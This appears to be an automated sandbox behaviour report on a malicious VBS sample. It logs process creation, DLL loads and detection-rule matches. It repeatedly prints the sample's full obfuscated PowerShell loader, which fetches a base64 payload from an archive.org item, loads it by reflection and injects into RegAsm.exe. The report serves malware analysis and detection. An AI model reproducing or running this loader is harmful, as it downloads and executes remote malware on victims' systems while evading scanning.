                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B2C0DBD4_2_00007FFB4B2C0DBD
                  Source: PofaABvatI.vbsInitial sample: Strings found which are bigger than 50
                  Source: Process Memory Space: powershell.exe PID: 2952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@16/5@2/2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2z0jdzt.y3b.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PofaABvatI.vbsVirustotal: Detection: 8%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1595867471.000001A064DD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSl", "0", "false");
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 